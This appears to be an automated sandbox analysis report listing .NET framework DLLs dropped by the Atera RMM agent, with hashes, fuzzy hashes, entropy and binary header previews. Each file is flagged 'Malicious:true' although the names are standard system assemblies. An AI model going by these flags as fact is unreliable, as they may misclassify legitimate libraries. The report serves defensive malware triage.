                                                                                                                                                                                                                                                                                                                                  SHA-256:F45F7FCB2A8398B9D2817B808F2B6141DD1E7071F86466C34D5D07EE523088FE
                                                                                                                                                                                                                                                                                                                                  SHA-512:915875A7AD021A458489209D3687DBE2B13791833178F95DD0890B843FED574C2D749F8EAEACE6637E30BF782C868A5BFE74A3314D81C356F01F242D2D5F396B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................&....@..................................(..O....@..P...............((...`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.851823443966221
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nNoqWD7WJlNyb8E9VF6IYijSJIVxejP0IRV:nNofwhEpYi60w/v
                                                                                                                                                                                                                                                                                                                                  MD5:B7707677F95DC6B65F60C83030EE109E
                                                                                                                                                                                                                                                                                                                                  SHA1:29956B237B59E670BF64ECDF35D8C114504B9024
                                                                                                                                                                                                                                                                                                                                  SHA-256:199036C43CE49DA87DFEE274CE22EDCD542A67E293ECC85FA821FD5CCBE5B300
                                                                                                                                                                                                                                                                                                                                  SHA-512:9A41B0A63EEDE79B047F67B49D6FF4D9B89E69D30B93333FAC1512C686FDCF3E06BA1A4D901F00AE070063B9F030BA58CB785285B1385B5268605FFC74CE580A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................sb....@.................................|(..O....@..@...............((...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.864186494702641
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:7GETSAWUEWSWNyb8E9VF6IYijSJIVx6tjvJ/:/T18+EpYi60sV
                                                                                                                                                                                                                                                                                                                                  MD5:97639DFEDEA8F0AF1D2E56FAD1704859
                                                                                                                                                                                                                                                                                                                                  SHA1:01DE4054E592C84A08E910E3651566AC38B8AD9E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9EBCAE092ECC2922CDC5FDA70B3E2A7D8F80D44C2B8B7B05A7E685B4304C722E
                                                                                                                                                                                                                                                                                                                                  SHA-512:0A69B160C8A669B85E45EB743C05280A16F461C9066E8B6D57A16AA328550B20C2B43226348AB1845E887CF4A899B48BF48F79706AE563EBC23DF6D3D0F68AF0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ..............................Sv....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):110120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.511217591949193
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:2POw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76Y:2Ww0SUUKBM8aOUiiGw7qa9tK/Ybf
                                                                                                                                                                                                                                                                                                                                  MD5:6DBDC27D0AB23FC16FA9D6C224972BA4
                                                                                                                                                                                                                                                                                                                                  SHA1:ECECDE85EDD6683E869D0DCA87FA14A45088280F
                                                                                                                                                                                                                                                                                                                                  SHA-256:A8EC7F0B3AE01162D864EBFB6F025D00D2122606713A00B01CFAE359AC3B9965
                                                                                                                                                                                                                                                                                                                                  SHA-512:E53BEE2E201F227D0A4C7B3FEAE0A3E55F37A4A6AC51EE159AA70AADBCDA80740A01A92862F47FD81D82AB9F1349C6E6B7B2CEAB6BCCDAA2532402A1B587051A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ...................................@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.847004569821564
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ncDagtDApWSKJWFrNyb8E9VF6IYijSJIVx4Ls+23:nPKBKnEpYi60NL
                                                                                                                                                                                                                                                                                                                                  MD5:6A285FBCB275B776188A0700D17A5C87
                                                                                                                                                                                                                                                                                                                                  SHA1:121264030BF0F63F1B979C5CB5AE950055C15974
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B679390ABE5842EAD1C9B714CD09F4E9B6F76DBCDFE00B8ABE80681C4173DD5
                                                                                                                                                                                                                                                                                                                                  SHA-512:CCFB93573F10AE73C3498892CF5E952542DB00DE49602C241A95E588309537598121754DB097CAE84F532BE162D6113C696C8FB6441B7B21A25AF53C8B70EB98
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ....................................@.................................0+..O....@..................((...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.859026958887054
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:o6NxhqWD4W5wP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFAyboMyN2Lj:FIWD4WmiNyb8E9VF6IYijSJIVxM0wMX
                                                                                                                                                                                                                                                                                                                                  MD5:0F97E6F5A0860FBB4DEC57E79AF9C3F2
                                                                                                                                                                                                                                                                                                                                  SHA1:E98ABB769A4498B5E4781EE19361C074CD5B335F
                                                                                                                                                                                                                                                                                                                                  SHA-256:88DFE7855EA29F7E964063FB090F5FCC77145ABDAE603230C6E9BD18FC3DB0DC
                                                                                                                                                                                                                                                                                                                                  SHA-512:C5B447C0782D6380833251D790AEA3781D7164FCA1D1B73CF7A879F04E2C8A6EF2AF8B0184A82E0D96D6C0C2651C3862F3BFAA6622CB35B0E55F953B8A370B3D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................,....@..................................(..O....@..@...............((...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.785865559792791
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JW2KxVSWzQW5qPFNyby2sE9jBF6IYiYF85S35IVnxGUHFh/JZlG6M0+3:2MWzQWc9Nyb8E9VF6IYijSJIVxN/Jjs3
                                                                                                                                                                                                                                                                                                                                  MD5:01AAA89F873C7F2CA6549DA1F7D7DB38
                                                                                                                                                                                                                                                                                                                                  SHA1:4AFDD877A0CF62C9EEAF2F68D1B3E040030D2E7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:515DCBAF86DE4ABD13E0DBE6D5021A87CF75DBB325E4904EA99D32A67DD125F2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3B48FCF1F18A8C41758F1F4FC036EE6B5A958D081D5B35F189D150DCAB2E99CDE204C790B0078B31F12987ACDBA192C2BF1A671CF198D00FB8C6F6033805D50F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ....................................@..................................)..O....@..@...............((...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.721584397937309
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kxDHKWAMWcpNyb8E9VF6IYijSJIVxlPKoK:8D8GtEpYi60VK
                                                                                                                                                                                                                                                                                                                                  MD5:190FE5FA1DC3BB8624D1610B7012459E
                                                                                                                                                                                                                                                                                                                                  SHA1:C88562B10BDF5A2CBFBAC5C5A351761914488C0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D903F96A7BD46D0424E066B3D8680ADD4698C2C16570542F69D61B004916EAD
                                                                                                                                                                                                                                                                                                                                  SHA-512:A5021A9DE77449E035BE890221F001373FB66BD5905F6305D3CBFDFCB30C52C16BDA50883B9009704909B241C861FDD3CA4E925E7ED6CFF156FBAEF6E7F1C2A5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................]?....@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8310985278723235
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ULNBEW6pWx7Nyb8E9VF6IYijSJIVxdT1qeAos:UbMSXEpYi60pA1
                                                                                                                                                                                                                                                                                                                                  MD5:BD051C2B9C53F401F9443D1DD5F462AA
                                                                                                                                                                                                                                                                                                                                  SHA1:80E85C5DD21A1AB7CB34CE947D2CFA02C59182EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:DCF472121B40BB573CFDB0B9921E53A3CE6E0B25090FD3410DDACE5864E92A45
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F75DA41D62292818AC0165DB158637FEB65413C5686C4AC53BC53984D48EEA89435FE12F343195516EFC4F7BAD2ECABF00E5AD5A421A861C617720DF1442E7C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.884235708560077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dKkHKW/tWBpNyb8E9VF6IYijSJIVxkNKuTwYOVtf:AumtEpYi60WlwXf
                                                                                                                                                                                                                                                                                                                                  MD5:D88D206941D1C611A448186479F9828E
                                                                                                                                                                                                                                                                                                                                  SHA1:C6559E6ED0DF998A102434F49AF16977DCD965AA
                                                                                                                                                                                                                                                                                                                                  SHA-256:26FA370494B85F58E1E0DCF850D2F2D526FEC0DA32775A4D98F62324E09A70C2
                                                                                                                                                                                                                                                                                                                                  SHA-512:7BA78BF4A08FF2C87FC3F245D6A014349280E7EE0D9A02383917074E261429D2AFE766C3258B932280DBBB3DEE4D3D5A7882D63910550FBF8D39F09B2583DE35
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................._....@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8301187506984045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5LnfIWqrWx8Nyb8E9VF6IYijSJIVx7Dq1b5k/:5Df4ocEpYi60gbG/
                                                                                                                                                                                                                                                                                                                                  MD5:FD088C08A01CFB32A4AD43F0696C8E3E
                                                                                                                                                                                                                                                                                                                                  SHA1:8AE6A8D448AE665183F619A2E56B3FB9677EB6A4
                                                                                                                                                                                                                                                                                                                                  SHA-256:261B29C7DC64E4DAE81EEB5E05400B4A8651E98FA4CA22AE849A37B5E96CB7D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:BB793F5B2597434DB2BD5CB610313418964F49A8A599531EC8DB5310C6BBA69D3A3ABA97A04011FB8B874248EFD0E6A4CB98CB5FCCABDB7AE53EC765B08A469C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................B.....@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671080695362279
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:2h06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeB287p:2y9gpEpYi60App
                                                                                                                                                                                                                                                                                                                                  MD5:F325B5108A0892671C3DA2378EDDA1D4
                                                                                                                                                                                                                                                                                                                                  SHA1:843CBD90B42A7E0C97CB48E5132F11E4AE024114
                                                                                                                                                                                                                                                                                                                                  SHA-256:58810B1E800572C89AC0F2B261D2E4CF50D973671782C89EDC2B73B6E56BC40D
                                                                                                                                                                                                                                                                                                                                  SHA-512:C8C6206ABC3690CDCD615758B18C3E8ACCE97612B1938D381B02FB59E8BB587DBFA55296A6C348F8F29080F99053B27D3E037207B78950E20807A96A037F68B7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.810087017924605
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:TZhbRtxWl8WK1W5dPnNyby2sE9jBF6IYiYF85S35IVnxGUHF8x/6Dpu+K05:1na8WK1WLfNyb8E9VF6IYijSJIVxY4fn
                                                                                                                                                                                                                                                                                                                                  MD5:25B3B9A59A9C4868EE37EEB6CB37751F
                                                                                                                                                                                                                                                                                                                                  SHA1:D0CCCF51877FE99B816AE3BE30D4DDFAA171F492
                                                                                                                                                                                                                                                                                                                                  SHA-256:654188F8671BC2725DC479CB0AA2E78D653C935D13176E98CFE2395FADB50268
                                                                                                                                                                                                                                                                                                                                  SHA-512:7B0DE8F004A908251B471877D9CBB8DDD166EC65AD4DF6FA69C2DA346AB25FC37F51B5B3C4098943E40B4329BC00022654B1281753B413E077D337299CFF5663
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ....................................@..................................*..O....@..................((...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.764681425802429
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:LBSWITWWSNyb8E9VF6IYijSJIVx3mR6gtkVv:L6LyEpYi60WRsv
                                                                                                                                                                                                                                                                                                                                  MD5:0821EA93570C51ED770730AFA432E228
                                                                                                                                                                                                                                                                                                                                  SHA1:26F2FAFB7712C5DFE931EA5658353794E06C94BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8783AAC385B675331EA76146DBE7590B476B435742307E58561D6A6A0E75757
                                                                                                                                                                                                                                                                                                                                  SHA-512:09F95B7E529A8017B53A875F398F73CAB267128A73C2E211DAEDC464F67AAC33596FE39B7B0E60D246421E31ECFA8A34CC2900A07474044A2E3FEC31A3E957D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ....................................@..................................)..O....@.. ...............((...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

